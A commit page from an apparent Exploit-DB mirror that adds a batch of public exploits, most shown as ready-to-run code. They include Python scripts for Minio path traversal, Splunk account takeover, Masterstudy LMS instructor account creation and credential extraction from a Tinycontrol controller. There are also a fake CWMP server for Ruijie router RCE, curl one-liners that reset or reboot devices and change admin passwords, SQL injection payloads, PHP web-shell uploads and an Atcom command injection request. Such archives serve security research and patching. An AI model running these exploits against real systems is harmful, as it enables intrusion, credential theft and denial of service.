bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-10-10

Browse source 
24 changes to exploits/shellcodes/ghdb

Minio 2022-07-29T19-40-48Z - Path traversal

Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service

Atcom 2.7.x.x - Authenticated Command Injection

Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction

OpenPLC WebServer 3 - Denial of Service

Splunk 9.0.5 - admin account take over

BoidCMS v2.0.0 - authenticated file upload vulnerability

Cacti 1.2.24 - Authenticated command injection when using SNMP options

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

Clcknshop 1.0.0 - SQL Injection

Coppermine Gallery 1.6.25 - RCE

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

GLPI GZIP(Py3) 9.4.5 - RCE

Limo Booking Software v1.0 - CORS

Media Library Assistant Wordpress Plugin - RCE and LFI

Online ID Generator 1.0 - Remote Code Execution (RCE)

Shuttle-Booking-Software v1.0 - Multiple-SQLi

Webedition CMS v2.9.8.8 - Blind SSRF

WEBIGniter v28.7.23 File Upload - Remote Code Execution

Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

Wordpress Sonaar Music Plugin 4.7 - Stored XSS

Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
This commit is contained in:
Exploit-DB 2023-10-10 00:16:32 +00:00
parent e5f7757184
commit f3649a641f
24 changed files with 2075 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

81
exploits/go/webapps/51734.py Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3
class MyMinio():
secure = False
def __init__(self, base_url, access_key, secret_key):
self.credits = Credentials(
access_key=access_key,
secret_key=secret_key
)
if base_url.startswith('http://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
elif base_url.startswith('https://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
self.secure = True
else:
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
def poc(self):
datetimes = datetime.datetime.utcnow()
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
urls = urllib.parse.urlparse(self.url)
headers = {
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
'X-Amz-Date': datetime_str,
'Host': urls.netloc,
}
headers = sign_v4_s3(
method='POST',
url=urls,
region='',
headers=headers,
credentials=self.credits,
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
date=datetimes,
)
if self.secure:
response = requests.post(url=self.url, headers=headers, verify=False)
else:
response = requests.post(url=self.url, headers=headers)
try:
message = json.loads(response.text)['Message']
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
matches = re.findall(pattern, message)
if matches:
print('There is CVE-2022-35919 problem with the url!')
print('The contents of the /etc/passwd file are as follows:')
for match in matches:
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
match[6]))
else:
print('There is no CVE-2022-35919 problem with the url!')
print('Here is the response message content:')
print(message)
except Exception as e:
print(
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
print(response.text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
args = parser.parse_args()
minio = MyMinio(args.url, args.accesskey, args.secretkey)
minio.poc()

47
exploits/hardware/dos/51730.txt Normal file
View file

@ -0,0 +1,47 @@
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The controller suffers from an unauthenticated
remote denial of service vulnerability. An attacker
can issue direct requests to the stm.cgi page to
reboot and also reset factory settings on the device.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5785
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
18.08.2023
--
$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller

176
exploits/hardware/remote/51727.txt Normal file
View file

@ -0,0 +1,176 @@
# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE)
# Date: April 15, 2023
# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
"""
Summary
=======
The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from html import escape, unescape
import http.server
import socketserver
import io
import time
import re
import argparse
import gzip
# command payload
command = "uname -a"
# change this to serve on a different port
PORT = 8080
def cwmp_inform(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
for parameter in parameters:
parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
result['parameters'][parameter_name] = parameter_value
return result
def cwmp_inform_response():
return """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
def command_payload(command):
current_time = time.time()
result = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
return result
def command_response(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
return result
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(204)
self.end_headers()
def do_POST(self):
print("[*] Got hit by", self.client_address)
f = io.BytesIO()
if 'service' in self.path:
stage, info = self.parse_stage()
if stage == "cwmp_inform":
self.send_response(200)
print("[!] Got Device information", self.client_address)
print("[*] Product Class:", info['product_class'])
print("[*] Serial Number:", info['serial_number'])
print("[*] MAC Address:", info['parameters']['mac'])
print("[*] STUN Client IP:", info['parameters']['stunclientip'])
payload = bytes(cwmp_inform_response(), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
elif stage == "command_request":
self.send_response(200)
self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
print("[*] Device interacting", self.client_address)
print(info)
payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
else:
print("[*] Command response", self.client_address)
print(unescape(info['response']))
self.send_response(204)
f.write(b"")
else:
print("[x] Received invalid request", self.client_address)
self.send_response(204)
f.write(b"")
f.seek(0)
self.send_header("Connection", "keep-alive")
self.send_header("Content-type", "text/xml;charset=utf-8")
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def parse_stage(self):
content_length = int(self.headers['Content-Length'])
post_data = gzip.decompress(self.rfile.read(content_length))
if "cwmp:Inform" in post_data.decode("utf-8"):
return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
return ("command_response", command_response(post_data.decode("utf-8")))
else:
return ("command_request", "Ping!")
def log_message(self, format, *args):
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
help='Specify alternate bind address '
'[default: all interfaces]')
parser.add_argument('port', action='store',
default=PORT, type=int,
nargs='?',
help='Specify alternate port [default: {}]'.format(PORT))
args = parser.parse_args()
Handler = CustomHTTPRequestHandler
with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
ip_addr = args.bind if args.bind != '' else '0.0.0.0'
print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
"""
Output
======
ubuntu:~$ python3 exploit.py
[!] serving fake CWMP server at 0.0.0.0:8080
[*] Got hit by ('[redacted]', [redacted])
[!] Got Device information ('[redacted]', [redacted])
[*] Product Class: EW1200G-PRO
[*] Serial Number: [redacted]
[*] MAC Address: [redacted]
[*] STUN Client IP: [redacted]:[redacted]
[*] Got hit by ('[redacted]', [redacted])
[*] Device interacting ('[redacted]', [redacted])
Ping!
[*] Got hit by ('[redacted]', [redacted])
[*] Command response ('[redacted]', [redacted])
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.300/0.335/0.400 ms
Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
"""

117
exploits/hardware/remote/51731.py Executable file
View file

@ -0,0 +1,117 @@
#!/usr/bin/env python
#
#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction
# Exploit Author: LiquidWorm
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#
import subprocess
import requests
import base64
import sys
binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []
print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
| |
| Tinycontrol LK3 1.58 Settings DL |
| ZSL-2023-5786 |
| 2023 (c) Zero Science Lab |
| |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
| |
""")
if len(sys.argv) != 2:
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
exit(-0)
else:
rhost=sys.argv[1]
if not "http" in rhost:
rhost="http://{}".format(rhost)
try:
resp = requests.get(rhost + "/" + binb)
if resp.status_code == 200:
with open(outf, 'wb') as f:
f.write(resp.content)
print(f"[*] Got data as {outf}")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
print("[!] Error:", str(e))
exit(-1)
binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")
for thricer in linea:
if bpatt in thricer:
startf = True
elif epatt in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)
if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Error decoding:", str(e))
else:
print("[!] Regex failed.")
exit(-2)

62
exploits/hardware/remote/51732.txt Normal file
View file

@ -0,0 +1,62 @@
#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
18.08.2023
"
set -euo pipefail
IFS=$'\n\t'
if [ $# -ne 2 ]; then
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
exit
fi
IP=$1
PW=$2
EN=$(echo -n $PW | base64)
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne '\nAdmin password changed to: '$PW

36
exploits/hardware/remote/51742.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link:
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
Exploit Request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
Response:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'

116
exploits/multiple/dos/51746.txt Normal file
View file

File diff suppressed because one or more lines are too long

96
exploits/multiple/webapps/51747.py Executable file
View file

@ -0,0 +1,96 @@
#!/usr/bin/env python3
#
# Exploit Title: Splunk 9.0.5 - admin account take over
# Author: [Redway Security](https://twitter.com/redwaysec))
# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
#CVE: CVE-2023-32707
# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
#
import argparse
import requests
import random
import string
import base64
# ignore warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Parse command-line arguments
parser = argparse.ArgumentParser(description='Splunk Authentication')
parser.add_argument('--host', required=True, help='Splunk host or IP address')
parser.add_argument('--username', required=True, help='Splunk username')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--target-user', required=True, help='Target user')
parser.add_argument('--force-exploit', action='store_true',
help='Force exploit')
args = parser.parse_args()
# Splunk server settings
splunk_host = args.host.split(':')[0]
splunk_username = args.username
splunk_password = args.password
target_user = args.target_user
force_exploit = args.force_exploit
splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
credentials = f"{splunk_username}:{splunk_password}"
base64_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
'Authorization': f'Basic {base64_credentials}'
}
proxies = {
# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080'
}
response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
affected_versions = ['9.0.4', '8.2.10', '8.1.13']
user = response.json()
splunk_version = user['generator']['version']
# This is not a good way to compare versions.
# There is a range of versions that are affected by this CVE, but this is just a PoC
# 8.1.0 to 8.1.13
# 8.2.0 to 8.2.10
# 9.0.0 to 9.0.4
print(f"Detected Splunk version '{splunk_version}'")
if any(splunk_version <= value for value in affected_versions) or force_exploit:
user_capabilities = user['entry'][0]['content']['capabilities']
if 'edit_user' in user_capabilities:
print(
f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
new_password = ''.join(random.choice(
string.ascii_letters + string.digits) for _ in range(8))
change_password_payload = {
'password': new_password,
'force-change-pass': 0,
'locked-out': 0
}
response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
data=change_password_payload, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print(
f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
else:
print('Account takeover failed')
else:
print(
f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
else:
print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
print(
f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
exit(1)

2
exploits/php/webapps/51688.txt
View file

@ -15,5 +15,3 @@ Content-Type: application/x-www-form-urlencoded
Content-Length: 756
_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
-- Sent with https://mailfence.com Secure and private email

418
exploits/php/webapps/51726.py Executable file
View file

File diff suppressed because one or more lines are too long

39
exploits/php/webapps/51728.txt Normal file
View file

@ -0,0 +1,39 @@
## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
STATUS: HIGH-CRITICAL Vulnerability
[+]Bypass login SQLi:
# In login form, for user:
```mysql
nu11secur1ty' or 1=1#
```
[+]Shell Upload exploit:
## For system logo:
```php
<?php
phpinfo();
?>
```
[+]RCE Exploit
## Execution from the remote browser:
```URLhttp://localhost/id_generator/uploads/1693471560_info.php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
## Time spend:
00:10:00

39
exploits/php/webapps/51729.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Version: 1.0.0
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---

100
exploits/php/webapps/51735.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
import requests
import os
import re
import time
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================
"""
print(banner)
# get nonce
def get_nonce(target):
open_target = requests.get("{}/user-public-account".format(target))
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
if search_nonce[1] != None:
return search_nonce[1]
else:
print("Failed when getting Nonce :p")
# privielege escalation
def privesc(target, nonce, username, password, email):
req_data = {
"user_login":"{}".format(username),
"user_email":"{}".format(email),
"user_password":"{}".format(password),
"user_password_re":"{}".format(password),
"become_instructor":True,
"privacy_policy":True,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":[],
"redirect_page":"{}/user-account/".format(target)
}
start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
if start.status_code == 200:
print("[+] Exploit Success !!")
else:
print("[+] Exploit Failed :p")
# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)
if int(int_version) < 3018:
print("[+] Target is Vulnerable !!")
# Credential
email = input("[+] Email: ")
username = input("[+] Username: ")
password = input("[+] Password: ")
time.sleep(1)
print("[+] Getting Nonce...")
get_nonce = get_nonce(target)
# Get Nonce
if get_nonce != None:
print("[+] Success Getting Nonce: {}".format(get_nonce))
time.sleep(1)
# Start PrivEsc
privesc(target, get_nonce, username, password, email)
# ----------------------------------
else:
print("[+] Target is NOT Vulnerable :p")

44
exploits/php/webapps/51736.txt Normal file
View file

@ -0,0 +1,44 @@
## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution
## Author: nu11secur1ty
## Date: 09/04/2023
## Vendor: https://webigniter.net/
## Software: https://webigniter.net/demo
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The media function suffers from file upload vulnerability.
The attacker can upload and he can execute remotely very dangerous PHP
files, by using any created account before this on this system.
Then he can do very malicious stuff with the server of this application.
## Staus: HIGH-CRITICAL Vulnerability
[+]Simple Exploit:
```PHP
<?php
phpinfo();
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)
## Time spent:
00:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

48
exploits/php/webapps/51737.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
